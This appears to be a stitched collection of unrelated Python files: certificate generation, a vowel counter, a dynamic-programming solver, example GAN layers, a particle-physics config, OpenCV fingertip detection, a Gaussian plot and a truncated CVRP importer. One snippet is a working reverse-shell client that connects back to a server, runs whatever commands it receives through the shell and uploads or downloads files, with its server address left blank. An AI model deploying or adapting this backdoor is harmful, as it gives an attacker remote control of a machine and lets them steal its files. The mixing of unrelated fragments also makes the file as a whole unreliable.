        cert.sign(k, 'sha1')
        # Context managers ensure the files are flushed and closed.
        with open(join(cert_dir, CERT_FILE), "wt") as cert_file:
            cert_file.write(crypto.dump_certificate(crypto.FILETYPE_PEM, cert))
        with open(join(cert_dir, KEY_FILE), "wt") as key_file:
            key_file.write(crypto.dump_privatekey(crypto.FILETYPE_PEM, k))
# Runs at import time; writing into /etc/nginx normally requires root.
create_self_signed_cert("/etc/nginx")
|
# Count the vowels in a name, demonstrated three equivalent ways
# (the three printed values are always identical).
name = input("enter your name : ")
vowels = ['a', 'e', 'i', 'o', 'u']
count = 0
for ch in name:
    if ch in vowels:
        count += 1
print(count)
# FIX: the original wrapped `name` in list() before filtering — redundant,
# since a string already iterates by character.
print(len(list(filter(lambda x: x in vowels, name))))
print(len(list(filter(lambda x: x in vowels, name))))
# Work out how to receive an e-mail message. Try researching the topic on your
# own (the IMAP and POP3 mail-retrieval protocols are the place to start).
|
import socket
import subprocess
import json
import os
# import speech_recognition as sr
import base64
class Client:
    """TCP client that connects back to a server, executes received commands,
    and returns results as JSON. NOTE(review): executes arbitrary remote
    commands with shell=True — only ever run against a trusted server."""
    def __init__(self, ip, port):
        self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  # here socket.AF_INET is your ipv4 and
        # socket.SOCK_STREAM is your tcp/ip
        self.connection.connect((ip, port))  # connection back to server
    def execute_system_command(self, command):
        # SECURITY NOTE: shell=True runs the raw string through the shell.
        return subprocess.check_output(command, shell=True)  # returning system command output
    def send_data(self, command):
        json_data = json.dumps(command)  # dump data into json object
        self.connection.send(json_data.encode())  # sending json object back to server
    def write_file(self, path, data):
        # `data` is expected to be base64-encoded file content.
        with open(path, "wb") as file:
            file.write(base64.b64decode(data))  # write file to local file system
            return "[+] Upload successful."
    def receive_data(self):
        # Accumulate chunks until the buffer parses as complete JSON.
        # NOTE(review): if the peer closes the socket mid-message, recv()
        # returns b"" forever and this loop spins — TODO confirm/handle.
        json_data = b""
        while True:
            try:
                json_data = json_data + self.connection.recv(1024)  # receiving json object from server
                return json.loads(json_data)  # unwrap json object
            except ValueError:
                continue  # if still data is pending continue the process
    def change_directory(self, path):
        os.chdir(path)
        return "[+] Changing Working Directory to " + path
    # def record_mic(self, seconds): Yet to complete
    #     recognizer = sr.Recognizer()
    #     with sr.Microphone() as source:
    #         recognizer.adjust_for_ambient_noise(source)
    #         recorded_audio = recognizer.listen(source, timeout=5, phrase_time_limit=10)
    #         try:
    #             speech_to_text = recognizer.recognize_google(recorded_audio, language="en-US")
    #             return speech_to_text
    #         except Exception as e:
    #             print(e)
    def read_file(self, path):
        with open(path, "rb") as file:  # reading file in binary to send data to server
            return base64.b64encode(file.read())  # base64 is use to encode unknown characters
    def run(self):
        # Main loop: receive a command, dispatch it, send back the result.
        while True:
            command = self.receive_data()
            try:
                if command[0] == "exit":
                    self.connection.close()
                    exit()
                elif command[0] == "cd" and len(command) > 1:
                    command_result = self.change_directory(command[1])
                # elif command[0] == "record" and command[1] == "mic" and len(command) > 2:
                #     command_result = self.record_mic(command[2])
                elif command[0] == "download":
                    command_result = self.read_file(command[1]).decode()
                elif command[0] == "upload":
                    command_result = self.write_file(command[1], command[2])  # get path and content of file
                else:
                    command_result = self.execute_system_command(command).decode()
            except Exception as e:
                command_result = str(e)  # send error to server
            self.send_data(command_result)
# NOTE(review): placeholder arguments — fill in the server IP and port before
# running; as written, Client("", ) raises TypeError (missing `port`).
client = Client("", ) # use public ip of server to connect back
client.run()
|
# Uses python3
import sys
def optimal_sequence(n):
    """Greedy walk from n down to 1, preferring /3, then /2, then -1.
    Returns the visited values in increasing order.
    NOTE: the greedy choice does not always give the shortest sequence."""
    trace = []
    while n >= 1:
        trace.append(n)
        if n % 3 == 0:
            n //= 3
        elif n % 2 == 0:
            n //= 2
        else:
            n -= 1
    return reversed(trace)
def dynamic_sequence(n):
    """Shortest sequence from 1 to n using *3, *2 and +1 steps (dynamic
    programming). Returns the values along one optimal path, ascending."""
    # min_ops[i]: minimum number of operations needed to reach i from 1.
    min_ops = [0, 0]
    for i in range(2, n + 1):
        candidates = [min_ops[i - 1] + 1]
        if i % 3 == 0:
            candidates.append(min_ops[i // 3] + 1)
        if i % 2 == 0:
            candidates.append(min_ops[i // 2] + 1)
        min_ops.append(min(candidates))
    # Reconstruct one optimal path by walking backwards from n,
    # preferring /3, then /2, then -1 (same tie-break as the table build).
    path = []
    while n >= 1:
        path.append(n)
        if n % 3 == 0 and min_ops[n // 3] == min_ops[n] - 1:
            n //= 3
        elif n % 2 == 0 and min_ops[n // 2] == min_ops[n] - 1:
            n //= 2
        else:
            n -= 1
    return reversed(path)
# BUG FIX: the original assigned sys.stdin.read() to the name `input`,
# shadowing the built-in; use a distinct name instead.
data = sys.stdin.read()
n = int(data)
# sequence = list(optimal_sequence(n))  # greedy variant, kept for reference
sequence = list(dynamic_sequence(n))
# The number of operations is one less than the number of values on the path.
print(len(sequence) - 1)
for x in sequence:
    print(x, end=' ')
|
import numpy as np
import torch.nn as nn
from vegans.utils import get_input_dim
from vegans.utils.layers import LayerReshape
class MyGenerator(nn.Module):
    """Fully connected generator mapping input of shape gen_in_dim to samples
    of shape x_dim, with a Sigmoid output (values in [0, 1])."""
    def __init__(self, gen_in_dim, x_dim):
        super().__init__()
        self.hidden_part = nn.Sequential(
            nn.Flatten(),
            nn.Linear(np.prod(gen_in_dim), 128),
            nn.LeakyReLU(0.2),
            nn.Linear(128, 256),
            nn.LeakyReLU(0.2),
            nn.BatchNorm1d(256),
            nn.Linear(256, 512),
            nn.LeakyReLU(0.2),
            nn.BatchNorm1d(512),
            nn.Linear(512, 1024),
            nn.LeakyReLU(0.2),
            nn.BatchNorm1d(1024),
            nn.Linear(1024, int(np.prod(x_dim))),
            LayerReshape(x_dim)
        )
        self.output = nn.Sigmoid()
    def forward(self, x):
        # Hidden stack, then the final activation.
        x = self.hidden_part(x)
        return self.output(x)
def load_example_generator(x_dim, z_dim, y_dim=None):
    """ Load some example architecture for the generator.
    Parameters
    ----------
    x_dim : integer, list
        Indicating the number of dimensions for the real data.
    z_dim : integer, list
        Indicating the number of dimensions for the latent space.
    y_dim : integer, list, optional
        Indicating the number of dimensions for the labels.
    Returns
    -------
    torch.nn.Module
        Architecture for the generator.
    """
    # With labels, the generator input is latent code concatenated with label.
    if y_dim is not None:
        gen_in_dim = get_input_dim(dim1=z_dim, dim2=y_dim)
    else:
        gen_in_dim = z_dim
    return MyGenerator(gen_in_dim=gen_in_dim, x_dim=x_dim)
class MyAdversary(nn.Module):
    """Adversary network: caller supplies the first layer (conv or identity)
    and the final activation (Identity for a critic, Sigmoid for a
    discriminator); output is a single scalar per sample."""
    def __init__(self, adv_in_dim, first_layer, last_layer):
        super().__init__()
        self.hidden_part = nn.Sequential(
            first_layer,
            nn.Flatten(),
            nn.Linear(np.prod(adv_in_dim), 512),
            nn.LeakyReLU(0.2),
            nn.Linear(512, 256),
            nn.LeakyReLU(0.2),
        )
        self.feature_part = nn.Linear(256, 1)
        # last_layer is a class (e.g. nn.Sigmoid); instantiate it here.
        self.output = last_layer()
    def forward(self, x):
        x = self.hidden_part(x)
        x = self.feature_part(x)
        return self.output(x)
def load_example_adversary(x_dim, y_dim=None, adv_type="Critic"):
    """ Load some example architecture for the adversary.
    Parameters
    ----------
    x_dim : integer, list
        Indicating the number of dimensions for the real data.
    y_dim : integer, list, optional
        Indicating the number of dimensions for the labels.
    adv_type : str, optional
        "Critic" (Identity output) or "Discriminator" (Sigmoid output).
    Returns
    -------
    torch.nn.Module
        Architectures for adversary.
    """
    possible_types = ["Discriminator", "Critic"]
    if adv_type == "Critic":
        last_layer = nn.Identity
    elif adv_type == "Discriminator":
        last_layer = nn.Sigmoid
    else:
        raise ValueError("'adv_type' must be one of: {}.".format(possible_types))
    x_dim = [x_dim] if isinstance(x_dim, int) else x_dim
    if y_dim is not None:
        adv_in_dim = get_input_dim(dim1=x_dim, dim2=y_dim)
    else:
        adv_in_dim = x_dim
    # For larger image inputs, prepend one strided conv to shrink the input;
    # the output spatial size follows the standard conv arithmetic.
    if len(adv_in_dim) == 3 and np.prod(adv_in_dim)>1024:
        first_layer = nn.Conv2d(in_channels=adv_in_dim[0], out_channels=3, kernel_size=5, stride=2)
        out_pixels_x = int((adv_in_dim[1] - (5 - 1) - 1) / 2 + 1)
        out_pixels_y = int((adv_in_dim[2] - (5 - 1) - 1) / 2 + 1)
        adv_in_dim = (3, out_pixels_x, out_pixels_y)
    else:
        first_layer = nn.Identity()
    return MyAdversary(adv_in_dim=adv_in_dim, first_layer=first_layer, last_layer=last_layer)
class MyEncoder(nn.Module):
    """Encoder mapping input of shape enc_in_dim to a latent code of shape
    z_dim (linear output, no final activation)."""
    def __init__(self, enc_in_dim, z_dim, first_layer):
        super().__init__()
        self.hidden_part = nn.Sequential(
            first_layer,
            nn.Flatten(),
            nn.Linear(np.prod(enc_in_dim), 256),
            nn.LeakyReLU(0.2),
            nn.Linear(256, 128),
            nn.LeakyReLU(0.2),
            nn.Linear(128, np.prod(z_dim)),
            LayerReshape(z_dim)
        )
        self.output = nn.Identity()
    def forward(self, x):
        x = self.hidden_part(x)
        return self.output(x)
def load_example_encoder(x_dim, z_dim, y_dim=None):
    """ Load some example architecture for the encoder.
    Parameters
    ----------
    x_dim : integer, list
        Indicating the number of dimensions for the real data.
    z_dim : integer, list
        Indicating the number of dimensions for the latent space.
    y_dim : None, optional
        Indicating the number of dimensions for the labels.
    Returns
    -------
    torch.nn.Module
        Architectures for encoder.
    """
    z_dim = [z_dim] if isinstance(z_dim, int) else z_dim
    if y_dim is not None:
        enc_in_dim = get_input_dim(dim1=x_dim, dim2=y_dim)
    else:
        enc_in_dim = x_dim
    # For larger image inputs, prepend one strided conv to shrink the input;
    # the output spatial size follows the standard conv arithmetic.
    if len(enc_in_dim) == 3 and np.prod(enc_in_dim)>1024:
        first_layer = nn.Conv2d(in_channels=enc_in_dim[0], out_channels=3, kernel_size=5, stride=2)
        out_pixels_x = int((enc_in_dim[1] - (5 - 1) - 1) / 2 + 1)
        out_pixels_y = int((enc_in_dim[2] - (5 - 1) - 1) / 2 + 1)
        enc_in_dim = (3, out_pixels_x, out_pixels_y)
    else:
        first_layer = nn.Identity()
    return MyEncoder(enc_in_dim=enc_in_dim, z_dim=z_dim, first_layer=first_layer)
class MyDecoder(nn.Module):
    """Decoder mapping a latent code of shape dec_in_dim back to data of
    shape x_dim (linear output, no final activation)."""
    def __init__(self, x_dim, dec_in_dim):
        super().__init__()
        self.hidden_part = nn.Sequential(
            nn.Flatten(),
            nn.Linear(np.prod(dec_in_dim), 256),
            nn.LeakyReLU(0.2),
            nn.Linear(256, 128),
            nn.LeakyReLU(0.2),
            nn.Linear(128, np.prod(x_dim)),
            LayerReshape(x_dim)
        )
        self.output = nn.Identity()
    def forward(self, x):
        x = self.hidden_part(x)
        return self.output(x)
def load_example_decoder(x_dim, z_dim, y_dim=None):
    """ Load some example architecture for the decoder.
    Parameters
    ----------
    x_dim : integer, list
        Indicating the number of dimensions for the real data.
    z_dim : integer, list
        Indicating the number of dimensions for the latent space.
    y_dim : None, optional
        Indicating the number of dimensions for the labels.
    Returns
    -------
    torch.nn.Module
        Architectures for decoder.
    """
    x_dim = [x_dim] if isinstance(x_dim, int) else x_dim
    # With labels, the decoder input is latent code concatenated with label.
    if y_dim is not None:
        dec_in_dim = get_input_dim(dim1=z_dim, dim2=y_dim)
    else:
        dec_in_dim = z_dim
    return MyDecoder(x_dim=x_dim, dec_in_dim=dec_in_dim)
class MyAutoEncoder(nn.Module):
    """Auto-encoder with a 32-unit bottleneck mapping input of shape
    adv_in_dim back to data of shape x_dim (linear output)."""
    def __init__(self, adv_in_dim, x_dim, first_layer):
        super().__init__()
        self.hidden_part = nn.Sequential(
            first_layer,
            nn.Flatten(),
            nn.Linear(np.prod(adv_in_dim), 256),
            nn.LeakyReLU(0.2),
            nn.Linear(256, 128),
            nn.LeakyReLU(0.2),
            nn.Linear(128, 32),
            nn.LeakyReLU(0.2),
            nn.Linear(32, 128),
            nn.LeakyReLU(0.2),
            nn.Linear(128, 256),
            nn.LeakyReLU(0.2),
            nn.Linear(256, np.prod(x_dim)),
            LayerReshape(x_dim)
        )
        self.output = nn.Identity()
    def forward(self, x):
        x = self.hidden_part(x)
        return self.output(x)
def load_example_autoencoder(x_dim, y_dim=None):
    """ Load some example architecture for the auto-encoder.
    Parameters
    ----------
    x_dim : integer, list
        Indicating the number of dimensions for the real data.
    y_dim : integer, list, optional
        Indicating the number of dimensions for the labels.
    Returns
    -------
    torch.nn.Module
        Architectures for autoencoder.
    """
    if y_dim is not None:
        adv_in_dim = get_input_dim(dim1=x_dim, dim2=y_dim)
    else:
        adv_in_dim = x_dim
    # For larger image inputs, prepend one strided conv to shrink the input;
    # the output spatial size follows the standard conv arithmetic.
    if len(adv_in_dim) == 3 and np.prod(adv_in_dim)>1024:
        first_layer = nn.Conv2d(in_channels=adv_in_dim[0], out_channels=3, kernel_size=5, stride=2)
        out_pixels_x = int((adv_in_dim[1] - (5 - 1) - 1) / 2 + 1)
        out_pixels_y = int((adv_in_dim[2] - (5 - 1) - 1) / 2 + 1)
        adv_in_dim = (3, out_pixels_x, out_pixels_y)
    else:
        first_layer = nn.Identity()
    return MyAutoEncoder(adv_in_dim=adv_in_dim, x_dim=x_dim, first_layer=first_layer)
import numpy as np
from matplotlib import pyplot as plt
if __name__ == "__main__":
    # Black/White Image (1d): nine values so it can be reshaped to 3x3 below.
    image = np.array(
        [0, 1, 1, 1, 1, 1, 0, 0, 0, ],
        dtype=np.uint8,
    )
    print(f"B/W (1D):\n{image}")
    plt.imshow(image.reshape((3, 3)), cmap="gray")
    plt.show()
    # Grayscale Image (2d): one intensity value per pixel.
    image = np.array(
        [[0, 100, 100],
         [255, 255, 255],
         [100, 100, 0]],
        dtype=np.uint8,
    )
    print(f"Gray (2D):\n{image}")
    plt.imshow(image, cmap="gray")
    plt.show()
    # RGB Image (3d): three channel values per pixel.
    #                    R    G   B
    image = np.array([[[100, 42, 78],
                       [220, 47, 153]],
                      [[100, 42, 78],
                       [220, 47, 153]]], dtype=np.uint8)
    print(f"RGB (3D):\n{image}")
    plt.imshow(image)
    plt.show()
|
import FWCore.ParameterSet.Config as cms

# cmsRun configuration: MVA PF-MET -> lepton pairing -> pair filter -> SVFit
# mass reconstruction, over a MiniAOD input file.
process = cms.Process("SVFitProducer")

process.load("FWCore.MessageService.MessageLogger_cfi")
process.load('Configuration.StandardSequences.Services_cff')
process.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff')
process.load('JetMETCorrections.Configuration.JetCorrectionProducers_cff')
process.load('RecoMET.METPUSubtraction.mvaPFMET_cff')
process.load('SimGeneral.HepPDTESSource.pythiapdt_cfi')
process.load('Configuration.EventContent.EventContent_cff')
process.load('SimGeneral.MixingModule.mixNoPU_cfi')
process.load('Configuration.StandardSequences.GeometryRecoDB_cff')
process.load('Configuration.StandardSequences.MagneticField_38T_cff')
process.load('Configuration.StandardSequences.EndOfProcess_cff')
# NOTE(review): both the plain and condDBv2 GlobalTag configs are loaded;
# only the condDBv2 one is used below — confirm the first load is needed.
process.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_condDBv2_cff')

process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(1000))

process.source = cms.Source("PoolSource",
    # replace 'myfile.root' with the source file you want to use
    fileNames = cms.untracked.vstring(
        'file:/afs/cern.ch/work/m/molszews/CMSSW/Data/Phys14MiniAOD/GluGluToHToTauTau_M-125_13TeV-powheg-pythia6.root'
    )
)

# Keep everything except products of the local 'run' process, but retain the
# SVFit and lepton-pair products; write only events passing path 'p'.
process.out = cms.OutputModule("PoolOutputModule",
    outputCommands = cms.untracked.vstring( "keep *",
        "drop *_*_*_run",
        "keep *_svfit_*_*",
        "keep *_leptonPairWithMet_*_*"),
    SelectEvents = cms.untracked.PSet(SelectEvents = cms.vstring('p')),
    fileName = cms.untracked.string('/afs/cern.ch/work/m/molszews/CMSSW/Data/SVFitProducer.root')
)

# Other statements
from Configuration.AlCa.GlobalTag_condDBv2 import GlobalTag
process.GlobalTag = GlobalTag(process.GlobalTag, 'auto:run2_mc', '')

# Re-cluster AK4 PF jets from MiniAOD packed candidates (needed by MVA MET).
process.load("RecoJets.JetProducers.ak4PFJets_cfi")
process.ak4PFJets.src = cms.InputTag("packedPFCandidates")
from JetMETCorrections.Configuration.DefaultJEC_cff import ak4PFJetsL1FastL2L3

# Point the MVA MET inputs at the MiniAOD collections.
process.load("RecoMET.METPUSubtraction.mvaPFMET_cff")
#process.pfMVAMEt.srcLeptons = cms.VInputTag("slimmedElectrons")
process.pfMVAMEt.srcPFCandidates = cms.InputTag("packedPFCandidates")
process.pfMVAMEt.srcVertices = cms.InputTag("offlineSlimmedPrimaryVertices")
process.puJetIdForPFMVAMEt.jec = cms.string('AK4PF')
#process.puJetIdForPFMVAMEt.jets = cms.InputTag("ak4PFJets")
process.puJetIdForPFMVAMEt.vertexes = cms.InputTag("offlineSlimmedPrimaryVertices")
process.puJetIdForPFMVAMEt.rho = cms.InputTag("fixedGridRhoFastjetAll")

# Build tau/mu/electron pairs together with the MVA MET.
process.leptonPairWithMet = cms.EDProducer('PairProducerWithMet',
    vertices = cms.InputTag("offlineSlimmedPrimaryVertices"),
    taus = cms.InputTag("slimmedTaus"),
    muons = cms.InputTag("slimmedMuons"),
    electrons = cms.InputTag("slimmedElectrons"),
    mvamet = cms.InputTag("pfMVAMEt")
)

# Drop events where no lepton pair was found.
process.PairExistenceFilter = cms.EDFilter('PairExistenceFilter',
    pairs = cms.InputTag("leptonPairWithMet"),
)

process.svfit = cms.EDProducer('SVFitProducer',
    leptonMET = cms.InputTag("leptonPairWithMet"),
)

process.run = cms.Sequence(
    process.ak4PFJets*
    process.pfMVAMEtSequence*
    process.leptonPairWithMet*
    process.PairExistenceFilter*
    process.svfit)

process.p = cms.Path(process.run)
process.e = cms.EndPath(process.out)
|
import cv2 as cv
import numpy as np
def detect(img, cascade):
    """Run the Haar cascade and return hits as (x1, y1, x2, y2) corner boxes."""
    hits = cascade.detectMultiScale(img, scaleFactor = 1.1 , minNeighbors = 5,
                                    minSize=(30,30), flags=cv.CASCADE_SCALE_IMAGE)
    if len(hits) == 0:
        return []
    # detectMultiScale yields (x, y, w, h); add the origin onto the size
    # columns to convert widths/heights into bottom-right corners.
    hits[:, 2:] += hits[:, :2]
    return hits
def findFaceAra(img, cascade):
    """Locate face boxes in a color frame: grayscale + equalize, then cascade."""
    equalized = cv.equalizeHist(cv.cvtColor(img, cv.COLOR_RGB2GRAY))
    return detect(equalized, cascade)
def findMaxArea(contours):
    """Return the index of the contour most likely to be the hand, or -1.

    Candidates must fill at least 40% of their bounding box and be taller
    than wide; the largest such contour wins, but only if its area exceeds
    10000 px^2.
    """
    best_area, best_idx = -1, -1
    for idx, contour in enumerate(contours):
        area = cv.contourArea(contour)
        x, y, w, h = cv.boundingRect(contour)
        if area < (w * h) * 0.4:
            continue  # too hollow relative to its bounding box
        if w > h:
            continue  # wider than tall: unlikely to be an upright hand
        if area > best_area:
            best_area, best_idx = area, idx
    if best_area < 10000:
        best_idx = -1
    return best_idx
def caculateAngle(A, B):
    """Return the signed angle in degrees between 2D vectors A and B.

    Uses atan2(det, dot), where det is the 2D cross product. The previous
    code computed det as x1*x2 - y1*y2, which is not the cross product and
    yields wrong angles for most vector pairs; the correct determinant is
    x1*y2 - y1*x2.
    """
    x1, y1 = A[0], A[1]
    x2, y2 = B[0], B[1]
    dot = x1 * x2 + y1 * y2   # |A||B| cos(theta)
    det = x1 * y2 - y1 * x2   # |A||B| sin(theta) — 2D cross product
    angle = np.arctan2(det, dot) * 180 / np.pi
    return angle
def distanceBetweenTwoPoints(start, end):
    """Euclidean distance between two 2D points, truncated to an int."""
    dx = start[0] - end[0]
    dy = start[1] - end[1]
    return int(np.sqrt(dx * dx + dy * dy))
def getFingerPosition(max_contour, img_result, debug):
    """Estimate fingertip points on the hand contour.

    Returns (1, points) on success, or (-1, None) when no convexity defects
    are found. When `debug` is truthy, intermediate hulls/points are drawn
    onto img_result.
    """
    points1 = []

    # Image moments give area/centroid statistics of a contour;
    # m10/m00 and m01/m00 are the centroid coordinates.
    M = cv.moments(max_contour)
    cx = int(M['m10']/M['m00'])
    cy = int(M['m01']/M['m00'])

    # Polygon approximation: approxPolyDP reduces the contour's vertex count,
    # keeping the shape within an epsilon of 2% of the arc length
    # (True = treat the curve as closed).
    approx = cv.approxPolyDP(max_contour, 0.02*cv.arcLength(max_contour, True),
                             True)

    # Convex hull: the polygon wrapping the contour, skipping concave parts.
    hull = cv.convexHull(approx)

    # Keep only hull vertices above the centroid (candidate fingertips).
    for i, point in enumerate(hull):
        if cy > point[0][1]:
            points1.append(tuple(point[0]))

    if debug:
        cv.drawContours(img_result, [hull], 0, (0,255,0), 2)
        for point in points1:
            cv.circle(img_result, tuple(point), 15, (0,0,0), -1)

    # Convexity defects: the valleys between fingers along the hull.
    hull = cv.convexHull(approx, returnPoints=False)
    defects = cv.convexityDefects(approx, hull)

    if defects is None:
        return -1, None

    points2 = []
    for i in range(defects.shape[0]):
        s,e,f,d = defects[i,0]
        start = tuple(approx[s][0])
        end = tuple(approx[e][0])
        far = tuple(approx[f][0])

        angle = caculateAngle(np.array(end) - np.array(far),
                              np.array(start) - np.array(far))

        # Sharp (<45 deg), deep (d > 10000) valleys mark finger gaps; keep
        # their endpoints that lie above the centroid.
        if angle >0 and angle<45 and d > 10000:
            if start[1] < cy:
                points2.append(start)
            if end[1] < cy:
                points2.append(end)

    if debug:
        cv.drawContours(img_result, [approx], 0, (255,0,255),2)
        for point in points2:
            cv.circle(img_result, tuple(point), 20, (0,255,0),5)

    # Merge both candidate sets and drop duplicates.
    points1 = points1+ points2
    points1 = list(set(points1))

    # Final filter: keep candidates whose neighboring polygon vertices form
    # a sharp angle and are far enough away (a fingertip-like spike).
    new_points = []
    for point1 in points1:
        # Find this candidate's index in the approximated polygon.
        # NOTE: the loop variable shadows the outer `points2` list.
        idx = -1
        for j, points2 in enumerate(approx):
            if point1 == tuple(points2[0]):
                idx = j
                break

        if idx == -1:
            continue

        # Previous/next vertices, wrapping around the polygon.
        if idx-1 >=0:
            pre = np.array(approx[idx-1][0])
        else:
            pre = np.array(approx[len(approx) - 1][0])
        if idx + 1 <len(approx):
            next = np.array(approx[idx+1][0])
        else:
            next = np.array(approx[0][0])

        angle = caculateAngle(pre-point1, next-point1)
        distnace1 = distanceBetweenTwoPoints(pre, point1)
        distnace2 = distanceBetweenTwoPoints(next, point1)

        if angle <45 and distnace1 >40 and distnace2 > 40:
            new_points.append(point1)

    return 1, new_points
def process(img_bgr, img_binary, debug):
    """Find the hand contour in the binary mask and mark fingertips on a copy of the frame."""
    img_result = img_bgr.copy()

    contours, hierarchy = cv.findContours(img_binary, cv.RETR_EXTERNAL,
                                          cv.CHAIN_APPROX_SIMPLE)
    max_idx = findMaxArea(contours)
    if max_idx == -1:
        # No hand-like contour: return the untouched copy.
        return img_result

    if debug:
        cv.drawContours(img_result, [contours[max_idx]], 0, (0,0,255), 3)

    ret, points = getFingerPosition(contours[max_idx], img_result, debug)
    if ret > 0 and len(points) > 0:
        for point in points:
            cv.circle(img_result, point, 20, [255,0,255], 5)

    return img_result
# Face cascade is used to erase face pixels from the motion mask so the
# hand remains the dominant foreground blob.
face_cascade = cv.CascadeClassifier("../sample/haarcascade_frontalface_alt.xml")

cap = cv.VideoCapture('../sample/hand.avi')
# cap = cv.VideoCapture(0)

# MOG2 background subtraction isolates the moving foreground (the hand).
foregroundBackground = cv.createBackgroundSubtractorMOG2(
    history=500, varThreshold=250, detectShadows=False
)

while(1):
    ret, img_frame = cap.read()
    if ret == False:
        break

    img_frame = cv.flip(img_frame, 1)  # mirror for a selfie-style view
    img_blur = cv.GaussianBlur(img_frame, (5,5), 0)
    rect = findFaceAra(img_frame, face_cascade)

    # learningRate=0 keeps the background model frozen during detection.
    img_gmask = foregroundBackground.apply(img_blur, learningRate = 0)
    kernel = cv.getStructuringElement(cv.MORPH_ELLIPSE, (5,5))
    img_gmask = cv.morphologyEx(img_gmask, cv.MORPH_CLOSE, kernel, 1)

    height, width = img_frame.shape[:2]
    # Black out a full-height band around each detected face in the mask.
    for x1, y1, x2, y2 in rect:
        cv.rectangle(img_gmask, (x1-20, 0), (x2+20, height), (0,0,0), -1)

    img_result = process(img_frame, img_gmask, debug=False)
    cv.imshow('mask', img_gmask)
    cv.imshow('result', img_result)

    key = cv.waitKey(30)
    if key == 27:  # ESC quits
        break

cap.release()
cv.destroyAllWindows()
|
## gauss_surf.py
## Port of gauss_surf.m
# From A First Course in Machine Learning, Chapter 2.
# Simon Rogers, 01/11/11 [simon.rogers@glasgow.ac.uk]
# Surface and contour plots of a Gaussian
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.cm
from mpl_toolkits.mplot3d import Axes3D
plt.ion()

## The Multi-variate Gaussian pdf is given by:
# $p(\mathbf{x}|\mu,\Sigma) =
# \frac{1}{(2\pi)^{D/2}|\Sigma|^{1/2}}\exp\left\{-\frac{1}{2}(\mathbf{x}-\mu)^T\Sigma^{-1}(\mathbf{x}-\mu)\right\}$

## Define the Gaussian
mu = np.array([1, 2])
sigma = np.array([[1, 0.8], [0.8, 4]])

## Define the grid for visualisation
X, Y = np.meshgrid(np.arange(-5., 5.1, 0.1), np.arange(-5., 5.1, 0.1))

## Normalising constant 1 / ((2*pi)^(D/2) * |Sigma|^(1/2)), D = 2
const = (1/np.sqrt(2*np.pi))**2
const = const/np.sqrt(np.linalg.det(sigma))

# Centred grid points as rows of an (N, 2) matrix. flatten('F') replaces the
# long-removed flatten(1) and matches MATLAB's column-major X(:) ordering.
temp = np.stack((X.flatten('F') - mu[0], Y.flatten('F') - mu[1]), axis=1)
# Row-wise quadratic form (x-mu)^T Sigma^{-1} (x-mu): computed directly
# instead of np.diag(temp * inv * temp.T), which builds a full N x N matrix.
quad = np.sum((temp @ np.linalg.inv(sigma)) * temp, axis=1)
pdfv = const*np.exp(-0.5*quad)
pdfv = np.reshape(pdfv, X.shape).T

## Make the plots
plt.figure(1)
plt.contour(X, Y, pdfv)
fig = plt.figure(2)
# fig.gca(projection='3d') was removed in Matplotlib 3.6; add_subplot is the
# supported way to create a 3D axes.
ax = fig.add_subplot(projection='3d')
surf = ax.plot_surface(X, Y, pdfv, rstride=1, cstride=1,
                       cmap=matplotlib.cm.jet, linewidth=0, antialiased=False)
fig.colorbar(surf)
plt.pause(.1)  # required on some systems so that rendering can happen
# raw_input() is Python 2 only; input() is the Python 3 equivalent.
input('Press <ENTER> to continue...')
|
import numpy
from code import baseobjects as bo
from code.supports import euclidian_distance, retrieve_minimal_fleet_size
from collections import deque
class Importer(object):
    """Reads a CVRP instance file (TSPLIB-like format) into numpy structures.

    After import_data(): `info` holds the header key/value pairs,
    `node_coordinates_list` the (x, y) node positions, `distance_matrix` the
    symmetric node-to-node distances and `demand_array` the per-node demands.
    """

    def __init__(self):
        self.file_lines = []            # raw lines of the input file
        self.info = {}                  # header fields (NAME, DIMENSION, ...)
        self.node_coordinates_list = []
        self.distance_matrix = None     # numpy 2D array, filled by import_data
        self.demand_array = None        # numpy 1D array, filled by import_data

    def import_data(self, filename):
        """Parse `filename` and populate all instance attributes."""
        self._read_file(filename)
        self.info, break_lines = self._read_info()
        self.node_coordinates_list, demand_list = \
            self._return_nodes_and_delivery_lists(break_lines)
        adjacency_matrix_list = \
            self._create_distance_matrix(self.node_coordinates_list, int(self.info["DIMENSION"]))
        self.distance_matrix = numpy.array(adjacency_matrix_list)
        self.demand_array = numpy.array(demand_list)

    def _read_file(self, my_filename):
        # Load the whole file as a list of lines (without newlines).
        filelines = []
        with open(my_filename, "rt") as f:
            filelines = f.read().splitlines()
        self.file_lines = filelines

    def _read_info(self):
        """Collect header key/value pairs and locate the section boundaries.

        Returns (info_dict, (start, middle, end)) where the tuple holds the
        line indices of NODE_COORD_SECTION, DEMAND_SECTION and DEPOT_SECTION.
        """
        my_filelines = self.file_lines
        info = {}
        start = 0
        middle = 0
        end = 0
        for i, line in enumerate(my_filelines):
            if line.startswith("NODE_COORD_SECTION"):
                start = i
            elif line.startswith("DEMAND_SECTION"):
                middle = i
            elif line.startswith("DEPOT_SECTION"):
                end = i
            elif line.startswith("EOF"):
                break
            elif line.split(' ')[0].isupper():  # checks if line begins with UPPERCASE key
                splited = line.split(':')
                info[splited[0].strip()] = splited[1].strip()
        return info, (start, middle, end)

    def _return_nodes_and_delivery_lists(self, my_breaklines):
        """Extract node coordinates and demands from their respective sections."""
        my_filelines = self.file_lines
        start, middle, end = my_breaklines
        node_coordinates_list = []
        demand_list = []
        for i, line in enumerate(my_filelines):
            # Lines are "<id> <x> <y>" between start and middle ...
            if start < i < middle:
                splited = line.strip().split(' ')
                splited = list(map(float, splited))
                node_coordinates_list.append((splited[1], splited[2]))
            # ... and "<id> <demand>" between middle and end.
            if middle < i < end:
                splited = line.split(' ')
                splited = list(map(int, splited))
                demand_list.append(splited[1])
        return node_coordinates_list, demand_list

    def _create_distance_matrix(self, my_node_coordinates_list, my_dimension):
        """Build a symmetric distance matrix from the node coordinates.

        The upper triangle is computed with euclidian_distance, then mirrored
        into the lower triangle.
        """
        ncl = deque(my_node_coordinates_list[:])
        matrix = []
        while ncl:
            # Pad with zeros up to the diagonal, then distances to the
            # remaining nodes.
            row = [0] * (my_dimension + 1 - len(ncl))
            node1 = ncl.popleft()
            for node2 in ncl:
                row.append(euclidian_distance(node1, node2))
            matrix.append(row)
        for i in range(my_dimension):  # mirroring the matrix
            for j in range(my_dimension):
                try:
